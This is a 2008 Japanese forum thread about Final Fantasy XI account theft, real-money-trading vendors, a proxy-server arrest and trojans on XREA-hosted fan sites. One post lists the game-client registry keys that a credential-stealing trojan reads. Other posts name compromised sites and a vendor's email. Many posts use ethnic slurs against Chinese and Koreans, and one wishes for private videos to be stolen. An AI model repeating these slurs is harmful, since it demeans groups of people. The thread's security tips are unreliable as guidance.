633 名前:既にその名前は使われています:2008/08/26(火) 10:38:19 ID:7iE3iqJs
自動ログインが悪いとかどんだけ過去からやってきたんだよ

634 名前:既にその名前は使われています:2008/08/26(火) 10:39:12 ID:7n1RFDk7
>>633


635 名前:既にその名前は使われています:2008/08/26(火) 10:46:08 ID:vd6wHlB9
>>633
現在なら自動ログインは良いのか?

636 名前:既にその名前は使われています:2008/08/26(火) 10:49:36 ID:W6Z3PLdB
その逆で、自動だろうが手動だろうが抜かれてるんじゃなかったっけ

637 名前:既にその名前は使われています:2008/08/26(火) 10:49:41 ID:7n1RFDk7
>>635
ほっとけよこういうバカが抜かれるんだから

638 名前:既にその名前は使われています:2008/08/26(火) 11:12:49 ID:jrf12RMY
まーた荒らしか

639 名前:既にその名前は使われています:2008/08/26(火) 11:20:25 ID:WzdbcXPS
今は手入力だろうがソフトで入力しようがテンプレに入っているやつに感染したらアウトでしょ
でも自動のままにしている人の方がセキュリティを甘く考えている割合が多いとは思うね
Flash最新版ですと同じw

640 名前:既にその名前は使われています:2008/08/26(火) 11:23:14 ID:nT6rQxPE
>>631
やられてるねぇ。初出だと思う。

641 名前:既にその名前は使われています:2008/08/26(火) 11:39:54 ID:8j6528Lp
業者がsageまくりかよ

642 名前:既にその名前は使われています:2008/08/26(火) 11:40:44 ID:WNyIAo4P
>>588

>下松市内の会社員から「ゲームのIDを盗まれて仮想通貨をとられた」
>と不正アクセスの相談があり、接続元の男を特定した。


やっぱり警察に通報すると調査はしてくれるんだな


末端が逮捕されるだけかもしれないが垢ハックされた奴は警察に通報した方がいいぞ
精神的にもスッキリするだろ?

643 名前:既にその名前は使われています:2008/08/26(火) 11:45:36 ID:u5aFcyCD
警察も地域によってピンきりだからなー
捜査してくれる所としない所の情報収集が必要だ

644 名前:既にその名前は使われています:2008/08/26(火) 11:45:48 ID:RLE+2uI/
業者は滅べ

645 名前:既にその名前は使われています:2008/08/26(火) 11:47:59 ID:AOKn1L9Q
警察に通報しても意味が無いって言ってた奴が業者だってのが確定しましたね

646 名前:既にその名前は使われています:2008/08/26(火) 11:48:37 ID:n4e6cZFA
サーバー150台没収か、ざまぁ。
この調子でどんどん警察に通報しまくろうぜ

647 名前:既にその名前は使われています:2008/08/26(火) 11:51:50 ID:ytC2pF9i
犯人の男はどうせ捨て駒だろうが、踏み台サーバ150台を押さえたのは大きいな
踏み台設置コストが稼ぎを上回ればビジネスモデルが破綻するから撲滅できる

648 名前:既にその名前は使われています:2008/08/26(火) 11:54:35 ID:FHuww8xS
業者が必死にsageててワロタ

649 名前:既にその名前は使われています:2008/08/26(火) 11:57:22 ID:WzdbcXPS
いいニュースだ
ハックされたやつはとりあえず警察いっとけってことだよな

650 名前:既にその名前は使われています:2008/08/26(火) 12:02:59 ID:JBUNLs7A
>>588
自宅に150台とかすげぇな
クーラーフル稼働かw
しかしこの事件に使われた証拠は確定後返却じゃね?
この男は罰金があるがそれ以外何もないのが現状じゃないのかな?

651 名前:既にその名前は使われています:2008/08/26(火) 12:03:55 ID:y2xPudYu
業者の末端にJPがいるのか
はたまた国内にも逮捕におびえつつ
ハックしてるJPがいるのか
このニュースに超反応してるってことは
日本人業者かね
中華は所詮新しい中継屋を見繕うだけだろうし

652 名前:既にその名前は使われています:2008/08/26(火) 12:10:17 ID:JBUNLs7A
>>651
国内に無数に潜伏する中国の手先らしいよ

653 名前:既にその名前は使われています:2008/08/26(火) 12:12:00 ID:Qb+H58DN
こんな摘発しなくても、日本海の海底ケーブルをぶった切れば中朝韓まとめて
消えるのにな。あのケーブルいらね、と最近マジで思うわ。

654 名前:既にその名前は使われています:2008/08/26(火) 12:14:11 ID:onx557jM
>>652
大抵留学生

655 名前:既にその名前は使われています:2008/08/26(火) 12:15:40 ID:onx557jM
>>653
最強で電気検出性能の高い深海鮫を開発してくれ

656 名前:警察に通報すれば業者は逮捕されます:2008/08/26(火) 12:18:05 ID:2p1Stzwv
l■電気通信事業法違反:ネットで違法中継 容疑の男書類送検−−山口・下松署

インターネットでオンラインゲームを違法に中継したとして、
山口県警下松署は21日、東京都江戸川区でパソコン修理などを営む
中国人の男(30)を電気通信事業法違反(無届け事業)の疑いで
山口地検周南支部に書類送検した。

調べでは、男は昨年8月から今年6月まで、都内の自宅にネット接続を
代行するプロキシサーバ150台を設置し、中国などの利用者にゲーム
を中継した疑い。アクセス数は1102万回に及び、利用者から約172万円
の報酬を受け取っていたらしい。

下松市内の会社員から「ゲームのIDを盗まれて仮想通貨をとられた」 と不正アクセスの相談があり、接続元の男を特定した。
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
同様の摘発は今年に入って全国で2件目。オンラインゲームを運営する
国内の業者は、不正アクセスの多い中国からの接続を遮断している。

ソース:毎日新聞 2008年8月22日 西部朝刊
http://mainichi.jp/seibu/shakai/news/20080822ddp012040017000c.htm

657 名前:既にその名前は使われています:2008/08/26(火) 12:20:51 ID:KLFWa57V
googleで斜めサーチして1039045744が見つかったサイト

どちらも放置されてるみたいだから影響は判らんけど
下のはFFオフラインのサイトなんで業者見境無しな模様

FINAL FANTASY XI  みんなで攻略サイト
vana-diel●s12●xrea●com

Pangaea Online
pangaea●s4●xrea●com

658 名前:既にその名前は使われています:2008/08/26(火) 12:35:20 ID:pah6asiD
>パソコン修理などを営む中国人の男(30)
これって廃品回収とかで出てきたようなゴミみたいなPCを修理して海外に輸出してる中国人だと思う。

多分そういうPC使ってバイト感覚でやったんだろから、150台押収されても大した痛手じゃないと思う。

659 名前:既にその名前は使われています:2008/08/26(火) 12:36:47 ID:56VWaIIg
>>650
犯罪行為に使ったものだから、捜査の段階で、所有権放棄させる可能性もあるような
サーバーみたいに高価だと違うのかな

あと、犯罪行為の用に供したものは没収できるから、所有権放棄させなくとも没収して欲しいね
そのまま持たせておくと、再犯の可能性高い等の理由つけられるような気がするけど

660 名前:既にその名前は使われています:2008/08/26(火) 12:36:51 ID:pah6asiD
sageちまったage

661 名前:既にその名前は使われています:2008/08/26(火) 12:42:07 ID:y2xPudYu
どちらにせよあせってる奴がいるのは確かなのかな

662 名前:既にその名前は使われています:2008/08/26(火) 12:47:42 ID:8g65v8dv
国内でこれ系の摘発が増えれば
他ゲームの業者は日本に串置かなくても接続できる
FFに流れてくるのかな・・・

663 名前:既にその名前は使われています:2008/08/26(火) 12:48:25 ID:732NS1m5
問題は...

>電気通信事業法違反(無届け事業)

不正アクセスではなく無届事業でってのが...
不正アクセスした人間自体はやはり中国だから駄目ということか?
中継だけでは不正アクセス関係では駄目なのか。

こんな無届事業なんて大した罪じゃないからまたやるのは目に見えてるな。
暴力団の検挙も折込済みの事業みたいな。

664 名前:既にその名前は使われています:2008/08/26(火) 12:57:21 ID:WzdbcXPS
鯖管理などである程度敷居が高いことを考えると、一人でも二人でも減らすことは十分効果あると思う
特に検挙されやすいって広まればやるやつも減るかも試練し

665 名前:既にその名前は使われています:2008/08/26(火) 13:00:54 ID:nT6rQxPE
>>659
OSとしての役割がサーバなだけで物はそこらのPCでしょ。
串として動けばEeePCでも何でもいい。

666 名前:既にその名前は使われています:2008/08/26(火) 13:03:57 ID:JBUNLs7A
>>658
PC捨てるときは小さくして家庭用ゴミで出すのは間違ってなかった

667 名前:既にその名前は使われています:2008/08/26(火) 13:04:00 ID:eeaHDAST
いまだに対策もせず抜かれる奴ってなんなの死ぬの?

668 名前:既にその名前は使われています:2008/08/26(火) 13:04:03 ID:FHuww8xS
>サーバーみたいに高価だと違うのかな

んなわけねーだろw

669 名前:既にその名前は使われています:2008/08/26(火) 13:05:03 ID:JBUNLs7A
>>663
法律は知らないがDSTTと同じ感じか?
いや違うか?


670 名前:既にその名前は使われています:2008/08/26(火) 13:06:54 ID:n3AfWloz
>>659 >>665
鯖の仕事自体は、家庭用ルーターと同程度の負荷だから、ごみPCで充分すぎるな。
そのぶん台数増やしてたんだろう。

671 名前:既にその名前は使われています:2008/08/26(火) 13:07:17 ID:JBUNLs7A
>>662
FFは中国から接続できないんじゃなかったの?

672 名前:既にその名前は使われています:2008/08/26(火) 13:08:39 ID:n3AfWloz
>>667
実際に被害に会うまでは、一般人はこんなスレみないんだぜww
被害に会うとセキュリティ意識が10000倍になる。

673 名前:既にその名前は使われています:2008/08/26(火) 13:12:34 ID:XwP/xzxp
今後あの9月の更新で復帰組みが餌食になりそうだな。

674 名前:既にその名前は使われています:2008/08/26(火) 13:18:14 ID:JBUNLs7A
>>672
あれ接続できねぇ?
やめるべって言ってPCそのままで止める奴もいるんじゃね?
PCおかしくなったら買い換えw
僕の秘密のエロ動画とか流出元はそんなかんじだろ
業者もFF狙わないでエロ動画集めてるPCハックしろよ出来れば身内撮ったのでよろしく

675 名前:既にその名前は使われています:2008/08/26(火) 13:25:14 ID:y2xPudYu
>>671
雨とかEUとかに流れるってことじゃ?
まあ無理があるか

676 名前:既にその名前は使われています:2008/08/26(火) 13:32:39 ID:K+EBat5J
ルーティング処理自体はソケ7世代のPCで十分だからねえ
国内に潜伏している中継業者かなりいるかも

677 名前:既にその名前は使われています:2008/08/26(火) 13:44:34 ID:WB7t2tTN
>>672
何倍しても0ってことk

678 名前:既にその名前は使われています:2008/08/26(火) 13:47:34 ID:n3AfWloz
元が0の人はそうかもね。まじで・・・

679 名前:既にその名前は使われています:2008/08/26(火) 14:08:35 ID:fcwkMaxP
>>663
政治家が法規制する気全くなし

680 名前:既にその名前は使われています:2008/08/26(火) 14:33:13 ID:g+AVeNxO
>>679
チャイニーズブローカーはだいたい国内の893と繋がってる。
規制できるわけがない。むしろRMT完全合法化しかねない。

681 名前:既にその名前は使われています:2008/08/26(火) 14:33:20 ID:FY3FSb09
mana_pure@saku2.com

682 名前:既にその名前は使われています:2008/08/26(火) 14:33:34 ID:nT6rQxPE
>>663
うん。
中継しただけで捕まるなら、私がどこかの串を使ってどこかを攻撃したら
その鯖管理者が捕まっちゃったり、それだけではなく
プロバイダ(OCN、etc.)も捕まっちゃったりすることになる。
とある中継ポイント(アクセスポイントや串)が攻撃目的か否かを
法的に(カチンコチンに)定義するのはまず無理なので
通信事業は届出が必要、ということで捕まえるしかない。
(NCSoftのリネージュ2は海外を全面的に遮断していて、
今回同様に国内で中継した中華が捕まっている)。
肝心の攻撃者は中国にいて、警察はそこまで手は出さない。

ウイルス作成罪が成立していないという法的不備で
仕方なく(らきすたやガンダムの画像の無断使用という)
著作権法違反で捕まえた原田ウイルスとはまた次元の異なる話。

683 名前:既にその名前は使われています:2008/08/26(火) 14:34:58 ID:onx557jM
>>663
中継して報酬もらってたからだろ

684 名前:既にその名前は使われています:2008/08/26(火) 14:57:17 ID:2T14TTjv
>>631
削除された模様。

685 名前:既にその名前は使われています:2008/08/26(火) 15:12:21 ID:JBUNLs7A
>>680
スクエニと893との繋がり!?

686 名前:既にその名前は使われています:2008/08/26(火) 15:27:52 ID:g+AVeNxO
>>685
政治家&警察と893(朝鮮人)&チャイニーズマフィア、な。
893がAKS-74Uを肩から提げて堂々と持ち歩いてる地域すらある。美しい日本ここに極まれり。

687 名前:既にその名前は使われています:2008/08/26(火) 15:34:06 ID:nT6rQxPE
クリンコフはそう簡単には手に入らんでしょ。
ノリンコあたりのSMGがせいぜいじゃないか?

688 名前:既にその名前は使われています:2008/08/26(火) 15:39:17 ID:oeqm9yCh

もうホントにアホ書き込みで済まないんだが
YAHOOでカスペルスキーインターネットセキュリティを買おうと思ったんだ

2PCなんでカスペルのアカウント2つ以上のパックが欲しいんだけど
商品紹介を見ると、5つばかり並んで入るんだが
復垢の項目が無く、情け無い事にどれを買えばいいのか、、、
優待版と通常版も何が違うのかがイマイチ判らない

コレ買っとけ!というやつをズバリ教えてエロイ人!

689 名前:既にその名前は使われています:2008/08/26(火) 15:50:53 ID:QuNfm+Cq
>>679
政治屋が動くときは大概圧力団体からの働き掛けあった時だからねぇ
ネトゲ業界で圧力掛けれるほどの会社といえば親がソフバンのガンホーだが、
チョソだからアウツ
まぁ、ちゃんと投票しなさいってことだね

690 名前:既にその名前は使われています:2008/08/26(火) 16:05:37 ID:3XUCUTUs
>>688
「2ユーザー」って書いてあるのが2台使用可能
優待と通常は名前だけで、中身に違いはないらしい
どうしても見つからないなら代理店から直購入したほうが早いかもよ
体験版もあるし
ttp://www.just-kaspersky.jp/products/kis7/purchase/

宣伝ぽくなっちまうからちょとsageとく

691 名前:既にその名前は使われています:2008/08/26(火) 16:07:42 ID:cOa5NOb7
>>588
仮想世界でも迷惑かける中国人って・・・
マジで特亜からの通信遮断して欲しいわ。

692 名前:既にその名前は使われています:2008/08/26(火) 16:09:58 ID:x1QeqAVc
変な質問かもしれないのですが・・・
よかったら教えてくださいm(_ _)m
俗に言う「パス抜かれた」とか
ハックのウイルスってFF限定なものでしょうか?
例えばFFと別のオンラインゲームしてて
感染したら両方のパス危ないですか?


693 名前:既にその名前は使われています:2008/08/26(火) 16:12:32 ID:cOa5NOb7
>>692
危ない。

694 名前:既にその名前は使われています:2008/08/26(火) 16:13:08 ID:czXJ7df2
最近のは複合型が主流

チョン無料ネトゲとかなら大丈夫かもしれんが、RO、リネII、WoW、(信オン?)
辺りは抜かれると考えるべき

あとmixiのパス抜くのも入ってる場合あり

695 名前:既にその名前は使われています:2008/08/26(火) 16:14:08 ID:x1QeqAVc
>>693>>694
そうですか・・。ありがとうございましたm(_ _)m

696 名前:既にその名前は使われています:2008/08/26(火) 16:37:39 ID:g+AVeNxO
>>694
マビノギも確か被害があったはず。


697 名前:既にその名前は使われています:2008/08/26(火) 17:04:02 ID:Jk5m1Zkd
別のチョンゲだけど(既出だったらごめんよ)
odnを使った攻撃は認められてたね。
後一部プロバイダは中国人がネットカフェ用(笑)に使ってるのを承知で
回線を貸してるあほんたれだったりする

俺のいたISPは本社からして怪しかったというか
ずばり中国人もお客様ですっ!って世界だ。

698 名前:既にその名前は使われています:2008/08/26(火) 17:11:08 ID:7lW27gxd
あげれあげれ

699 名前:既にその名前は使われています:2008/08/26(火) 17:23:39 ID:NmssOHTq
「Firefox 2」ユーザーにアップデートを促す通知を開始
http://internet.watch.impress.co.jp/cda/news/2008/08/26/20657.html

「一太郎」に任意のコードを実行される脆弱性
http://internet.watch.impress.co.jp/cda/news/2008/08/26/20658.html

700 名前:既にその名前は使われています:2008/08/26(火) 17:31:14 ID:JBUNLs7A
>>688
いわゆる初心者?
カスペは初心者には勧められないよ。
なんだかんだで設定ミスって糞呼ばわり後に感染コースまっしぐらだよ
バスターとかノートンあたりにしとけ

701 名前:既にその名前は使われています:2008/08/26(火) 17:39:34 ID:kxyV6dSK
どうでもいいけどID:FY3FSb09(>>620,>>681)がきもいんだけど…。681のアドレスってアカ売買業者の連絡先だし。
嘘だと思うけど、名前と住所がでたらめ登録だったら巻き戻しできないんじゃないっけ?生年月日が正しければければ
改ざんされてたとしても昔の登録記録で大丈夫なもんなの?本人確認できるの?

702 名前:既にその名前は使われています:2008/08/26(火) 17:58:02 ID:tvWq7E0W
ハックを受け 一連の流れ上GMチャットへ
GMチャットへの通信自体ハックされ 身元証明
送り先が業者だった。(□eの名前かたって)
□eと思い送ってしまう。
とか あったら怖いな

703 名前:既にその名前は使われています:2008/08/26(火) 18:12:34 ID:BfqRE8fa
HDD1個だけ、カラカラカチカチ音がするんだ・・・読み込みも書き込みも遅い

704 名前:既にその名前は使われています:2008/08/26(火) 18:13:13 ID:v/p9stw+
>>701
最初の登録がまったくの架空名義での巻き戻しは無理ですね
そういう報告は上がっていませんし(信用に足る情報という意味で)
一般的に考えて(スクエニに限らず、たとえばクレカ会社とかでの
本人確認のような場合でも)住所・氏名・生年月日・電話番号くらいは
聞かれますから、誕生日だけ合っていてもそれだけで本人であると
確認できる情報だと、スクエニが判断するとは思えないと考えるのが
妥当だと思います

705 名前:既にその名前は使われています:2008/08/26(火) 18:14:16 ID:NSOKcFyl
7月18日 ハック
7月19日 必要書類投函
7月23日 アカウント凍結

8月26日 先ほど復旧メールが来て巻き戻し完了

アカウント凍結から五週間位で復旧かな
ポストに受け取っていたものは残っていて、ポスト回しをしていたアイテムは全ロストでした

706 名前:既にその名前は使われています:2008/08/26(火) 18:16:52 ID:v/p9stw+
>>703
HDDの異音は壊れる前兆だと考えるのが一般的です
早めに買い換えたほうが無難なように思います
動いている間ならデータの移し変えもできますし

707 名前:既にその名前は使われています:2008/08/26(火) 18:16:59 ID:WzdbcXPS
そうゆう手間の割りに儲からんことはやらないでしょ
業者が欲しいものは仮想通貨>>>>>>個人情報


708 名前:既にその名前は使われています:2008/08/26(火) 18:20:59 ID:K+EBat5J
わかっていない奴いるみたいだが、
巻き戻しには住民票など公的書類の提出が必要。
偽装住所などの垢はまず巻き戻し不可能と思った方がいい。


709 名前:既にその名前は使われています:2008/08/26(火) 18:22:55 ID:y2xPudYu
>>704
なきついて変えてもらったとかなかったっけ
信用に足る



710 名前:既にその名前は使われています:2008/08/26(火) 18:27:36 ID:oWfgID3W
>>703
俺のHDDは、ケラケラあはははは と音がするんだ・・・読み込みも書き込みも遅い

711 名前:既にその名前は使われています:2008/08/26(火) 18:29:04 ID:czXJ7df2
それなんかいるって!憑いてるって!

712 名前:既にその名前は使われています:2008/08/26(火) 18:29:54 ID:tvWq7E0W
ちょっとスレチかもなんだけど、
免許のコピーって確認するためであって
「コピー」そのものには効果ないですよね?
(仮に第三者に渡ったとしても)


713 名前:既にその名前は使われています:2008/08/26(火) 18:52:16 ID:kxyV6dSK
>>703
自分がアカウントハックされた時の症状が、確かFFAHだったかな…を開いた直後にHDDが
カタンカタンカタンとひっきりなしに1分間以上鳴り続けた。
その後も思い出したようにカタンカタンと何分も音を立てたりして、新しいのにHD壊れたかなーと思いつつ
でもまだ使えてるし…とか耐えてたら(馬鹿だったorz)1ヶ月後に抜かれた。
自分のはwzcsvbxm.dllタイプだったんだけど、それならカスペルスキーのオンラインスキャンで感染してるか分かるから
やってみたらいかがですか?

あと最近のハッキング被害者は情報出さなすぎ。ハッキングされるのは自己管理できてないからだ!て叩かれる〜;;
ってなっちゃうのは分かるけど、私もハッキングされるまではここの存在知らなくてノートン位しか対策してなくて
色々な物のアップデートも告知任せだった。恥は掻き捨てとか匿名性って言葉は好きじゃないけど、この場合は
それでいいんだと思う。なので情報を出して欲しい。そして極端に叩く人間は業者だと思うようにしている。
つか確実に親身な人は存在しているので勇気を出して報告してください。お願いします。

714 名前:既にその名前は使われています:2008/08/26(火) 18:53:51 ID:czXJ7df2
>>712
それこそ証明にコピーがつかわれることはあるんじゃね?

715 名前:既にその名前は使われています:2008/08/26(火) 18:55:15 ID:K+EBat5J
これからこのスレではHDDが音を出したらパスを抜かれることも話の対象になります

716 名前:既にその名前は使われています:2008/08/26(火) 18:57:42 ID:BW/NGIZv
却下します

717 名前:既にその名前は使われています:2008/08/26(火) 18:58:13 ID:WzdbcXPS
ワラタ

718 名前:既にその名前は使われています:2008/08/26(火) 19:00:05 ID:v/p9stw+
>>712
そのものの効果をどう読むかですけど、本人確認用の資料の場合なら
誰かがそれを使ってその免許証の人物に成りすますことは可能です
免許証とか健康保険証とかパスポートとか、身分を特定できるものの
ミスコピーは不用意に捨てないことですね

719 名前:既にその名前は使われています:2008/08/26(火) 19:03:32 ID:tvWq7E0W
>>714>>718
そっか。返答ありがとうm(_ _)m

720 名前:既にその名前は使われています:2008/08/26(火) 19:07:35 ID:kxyV6dSK
ん、HDDがカタカタ言い続けてFFや他の動作がカクカクするのはウィルスとは全然関係ないものなのかな?
自分はFFAHのサイト開いた直後に鳴り出して、FFしようとしたら不正終了して、その日PC落とそうとしたら
終了させるウィンドウが出てくるのに時間がかかったから、後から考えると感染症状の内の一つかと思ったんだけどなぁ。
まぁ確かにHDDの挙動は報告されてないから勘違いだったのかな;恥ずかしいorz
でもこんな恥にもめげないで心当たりのある事は言ってみた方が良いと思うんだ!とほほ

721 名前:既にその名前は使われています:2008/08/26(火) 19:11:51 ID:3m5zB9gx
オカルト板かここは

722 名前:既にその名前は使われています:2008/08/26(火) 19:13:55 ID:nYTJDyMg
>>720
それHDDがそろそろ逝くんじゃねーかな?
と予想w


723 名前:既にその名前は使われています:2008/08/26(火) 19:28:57 ID:kxyV6dSK
>>722 買ってまだ1年ちょっとのHDDだったからさー。でも人に相談した時も壊れるんじゃね?って言われてたw
なので新しいの買って入れました!age

724 名前:既にその名前は使われています:2008/08/26(火) 19:29:33 ID:y2xPudYu
凍結申請したぜ
中華めざまあミロ

725 名前:既にその名前は使われています:2008/08/26(火) 19:32:30 ID:czXJ7df2
もう金は向こうにわたってる件について

726 名前:既にその名前は使われています:2008/08/26(火) 19:35:03 ID:y2xPudYu
まあそうだけど
寝釣りにNMにと使われてたし
GM呼べるなら呼んでみろみたいなこと言ってたから

727 名前:既にその名前は使われています:2008/08/26(火) 19:36:04 ID:nd5iosx3
本人確認について、フレの話。
POL入会したのはハガキ確認が必須だった。
ハガキがでたらめ住所で■eに戻ると仮登録が消されちゃうので
フレは最初の登録だけまともな住所にして、POL本登録された後に
POL上からでたらめ住所電話番号にした。
例によってアカハックうけて、巻き戻しする際には謝って「最初のハガキ送付先の住所」での
身分証明で巻き戻し手続きうけてもらえたそうなんだが。

「でたらめ住所だと巻き戻しうけられないよ」って言ってる人って
POL本登録がハガキいらなかった頃(あるのか知らんが)の人とか
巻き戻しされたら困る誰か?

728 名前:既にその名前は使われています:2008/08/26(火) 19:37:31 ID:vA2q8zBd
>>727
最初から「個人情報なんか渡してやるもんか」とガチでムーミン谷とかにしてる人がいるんだよ
そういう人に対しての話だね

729 名前:既にその名前は使われています:2008/08/26(火) 19:39:19 ID:vA2q8zBd
追記すると、ハガキの送付先をいい加減にしててもPOL入会には何の問題もないらしい
「個人情報が盗まれた」の人(スクエニ相手に訴訟起こした人)とかはその例だね

730 名前:既にその名前は使われています:2008/08/26(火) 19:40:44 ID:v/p9stw+
>>727
POL入会にはがきを送った記憶がありません

731 名前:既にその名前は使われています:2008/08/26(火) 19:41:19 ID:nd5iosx3
いや、「ハガキが届かなくて■eに返送」だと仮登録消されるから
業者も必死で架空のじゃなくて実在の人間の住所使ってるんだろw
初期からハガキで確認してるのかどうか知らんけどさーw

732 名前:既にその名前は使われています:2008/08/26(火) 19:41:54 ID:y2xPudYu
ハガキこなくても平気なのは
初期からじゃなかったんか

733 名前:既にその名前は使われています:2008/08/26(火) 19:43:07 ID:v/p9stw+
>>727
はがきの件については、必要があればテンプレに加えるようにします

734 名前:既にその名前は使われています:2008/08/26(火) 19:45:00 ID:BfqRE8fa
1999年から使ってるHDDだしたぶん寿命です;ごめんなさい;;

735 名前:既にその名前は使われています:2008/08/26(火) 19:46:18 ID:5bXd0kdb
HDDには猫が飼われているもんだろ。
まあ、固有障害があると他のトラブルの露見を遅らせる要因にもなるから、早めに分析しておくにこしたことは無い。
HGSTならDrive Fitness Test、それ以外のメーカーでもPowerMaxやSeaTools、DLGDIAGなどがある。

736 名前:既にその名前は使われています:2008/08/26(火) 19:46:31 ID:vA2q8zBd
>>734
HDDってある日突然逝っちゃうから、早めにバックアップとるかデータ移しかえるか
やっておかないと大変だよw
壊れたあとで情報のサルベージとかを業者に頼むと十万とかかかるし

737 名前:既にその名前は使われています:2008/08/26(火) 19:49:52 ID:v/p9stw+
>>734
10年前のHDDって、容量がまだ300MBとか500MBくらいのものじゃないです?
もうGB単位のが出てたっけな・・・
まぁなんにしても早急にデータを移し変えたほうがいいですね〜
ほんとにデータ取り出しはお金がかかります

738 名前:既にその名前は使われています:2008/08/26(火) 19:50:08 ID:y2xPudYu
俺もウィルスチェック中に突然クラッシュしたよw

739 名前:既にその名前は使われています:2008/08/26(火) 20:01:18 ID:BfqRE8fa
買った時は60GBだったような気がしますが今は30GB分しか認識されてないです。
昔クレズにやられたあと、フォーマットしたらなんか減ってた;

とりあえずほかのドライブに分散してデータ退避させて、新しいの買ってきます。

740 名前:既にその名前は使われています:2008/08/26(火) 20:03:01 ID:nT6rQxPE
Klezてw そろそろ供養してやれ…。

741 名前:既にその名前は使われています:2008/08/26(火) 20:06:29 ID:8KubrZ/T
スキャンはHDDを酷使するから、
高耐久な純正採用品でも相当古いと逝くかもしれん。

これを期に新しい物に入れ替えて安心を得た方がいいね。

742 名前:既にその名前は使われています:2008/08/26(火) 20:07:27 ID:732NS1m5
規約違反行為者への一斉対処について (8/26)
http://www.playonline.com/ff11/polnews/news14005.shtml

743 名前:既にその名前は使われています:2008/08/26(火) 20:13:43 ID:nT6rQxPE
>>741
Windowsの巨大なServicePackなんかでも展開で死んじゃうことがあるねぇ。
それで「SP○は地雷だ!」と言われても〜みたいな。

744 名前:既にその名前は使われています:2008/08/26(火) 20:20:24 ID:F7UIiWoH
スペシャルタスクチームレポート (2008/08/26)
http://www.playonline.com/pcd/topics/ff11/detail/3618/detail.html

745 名前:既にその名前は使われています:2008/08/26(火) 20:24:31 ID:aDJ2oKpU
>>727
過去ネットのサポセンで働いていた経験から言うと、
住所を知られたくない=キチガイだったりする。
結構あるのよ。「匿名ですがおたくの〇〇が悪い」って電話。
とにかく、原因を特定するため(ネットの場合経路で悪い場合がある)に住所きかないと駄目なんだけど、
一向に教えないから、そんな電話の記録はたいていごみ箱行きにしてた。
しかも、こんな人間ほどしつこく電話かけてくるんだよ。警察じゃないっつーの。

746 名前:既にその名前は使われています:2008/08/26(火) 20:24:43 ID:3m5zB9gx
対処が行われた規約違反行為の種別とアカウント数の内訳は以下のとおりです:  ←

747 名前:既にその名前は使われています:2008/08/26(火) 20:27:32 ID:nT6rQxPE
>>744 よりこのスレ向けの部分をコピペ。
スペシャルタスクチームによるこれまでの調査では、不正アクセスの被害を受けたアカウントが、
RMTを目的として活動している規約違反行為者に利用されているという例が、数多く確認されています。
さらには、そのキャラクターが実際の規約違反行為に利用されているケースも増加しつつあります。
不正アクセスによる被害を最小限にとどめるため、そしてRMTに利用されるギルをより多く凍結するため、
スペシャルタスクチームでは7月より、不正アクセスに関与したアカウントの対処に
大きな比重を置いた活動を開始しています。その他の規約違反行為についても、
皆さんのプレイに支障がでない水準を維持できるよう、以後も適切な対処を継続していきます。

748 名前:既にその名前は使われています:2008/08/26(火) 20:36:06 ID:xFtoKThM
>>744
買い手の推移の方が知りたいな。果たして買い手は減ったのか増えたのか。
結局現金目的系の不正者数は買い手が多いかどうか?で決まると思うんだ。

749 名前:(仮):2008/08/26(火) 20:38:14 ID:nT6rQxPE
       ____
     /⌒  ⌒\
   /( ●)  (●)\
  /::::::⌒(__人__)⌒::::: \ アクセス解析見てたらスクエアエニックスさんから
  |     |r┬-|     | 初めてアクセスがあったお! がんばるお!
  \      `ー'´     /

そのリファラ
ttp://search.yahoo.co.jp/search?p=%E3%81%82%E3%81%BE%E3%81%99%E3%81%9A%E7%A5%AD%E3%82%8A
       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \
  |     (__人__)    |
  \     ` ⌒´     /

750 名前:既にその名前は使われています:2008/08/26(火) 20:44:06 ID:vA2q8zBd
>>749
あますずの反応見てるだけwwwwwwwwwwwwww
(仮)さん乙っすwwww

751 名前:既にその名前は使われています:2008/08/26(火) 21:00:50 ID:ZAEjXDYT
>>742
>・ギルやアイテムの現金による売買に関与していた
>7月第5週 約20件
>8月第1週 約20件
>8月第3週 約200件
>8月第4週 約150件
8月3週以降激増なのは、XREA改竄の影響かな?



752 名前:既にその名前は使われています:2008/08/26(火) 21:07:58 ID:JBUNLs7A
>>736
いつの間にか1年に1回はHDD入れ替えてるなw
バレンタインと同じだHDDメーカーにだまされている

753 名前:既にその名前は使われています:2008/08/26(火) 21:18:27 ID:QuNfm+Cq
ニダチョンを法的に裁くのは現実的に難しいから、
卸す所をどうにかできんかね
マツブシなんかは対処発表後に在庫無くなるとこみれば、ニダチョンから買い取ってるのは明らかだし

754 名前:既にその名前は使われています:2008/08/26(火) 21:21:06 ID:KLFWa57V
>>751
3週は2週分も含んでるだろうから
実際に増えてるのは4週と見た
今週末はアカハック被害増えるかもしれんね

755 名前:既にその名前は使われています:2008/08/26(火) 21:44:57 ID:JBUNLs7A
>>753
これだけ在庫失い繰り返してもうまみがあるのかね?
RMTって

756 名前:既にその名前は使われています:2008/08/26(火) 22:17:18 ID:FY3FSb09
>>755

知り合いの業者は1日で1億ギル生産してる。
何人でやってるのかはしらないけど 順調なら月1000万かせいでるね。

757 名前:既にその名前は使われています:2008/08/26(火) 22:26:14 ID:nT6rQxPE
12世代目(笑)のXREAトロイ。昨夜23時頃投入、昼頃検体送付済み。
ttp://www.virustotal.com/analisis/82116e25b606e9b42cb1a00413fe0b4b
以下のレジストリを触ることから、日米のFFXI、日米のリネージュII、
RO、リネージュ、信onのパス抜きと思われ。
HKLM\SOFTWARE\Gravity Soft\Ragnarok
HKLM\SOFTWARE\Koei\Nobunaga Online
HKLM\SOFTWARE\NC Soft\Lineage
HKLM\SOFTWARE\NCSoft\L2Client_jp
HKLM\SOFTWARE\NCSoft\L2Client_us
HKLM\SOFTWARE\PlayOnlineUS\InstallFolder
HKLM\SOFTWARE\PlayOnline\InstallFolder

758 名前:既にその名前は使われています:2008/08/26(火) 22:27:55 ID:IyMBqZg/
XREAサイト系ってFF11とまったく関係ないとこでも
仕込まれてたりする?

759 名前:既にその名前は使われています:2008/08/26(火) 22:32:37 ID:vA2q8zBd
>>758
報告例は無いけど可能性はあるし、今後狙われる可能性もある
何せカギの開け方は分かってるような状態だから

760 名前:既にその名前は使われています:2008/08/26(火) 22:43:56 ID:RdmIUZ9h
フラッシュプレイヤー更新してあれば安全ですよね?


761 名前:既にその名前は使われています:2008/08/26(火) 22:46:25 ID:W3FDmOyy
そういった死亡フラグを何度みてきたことか・・・

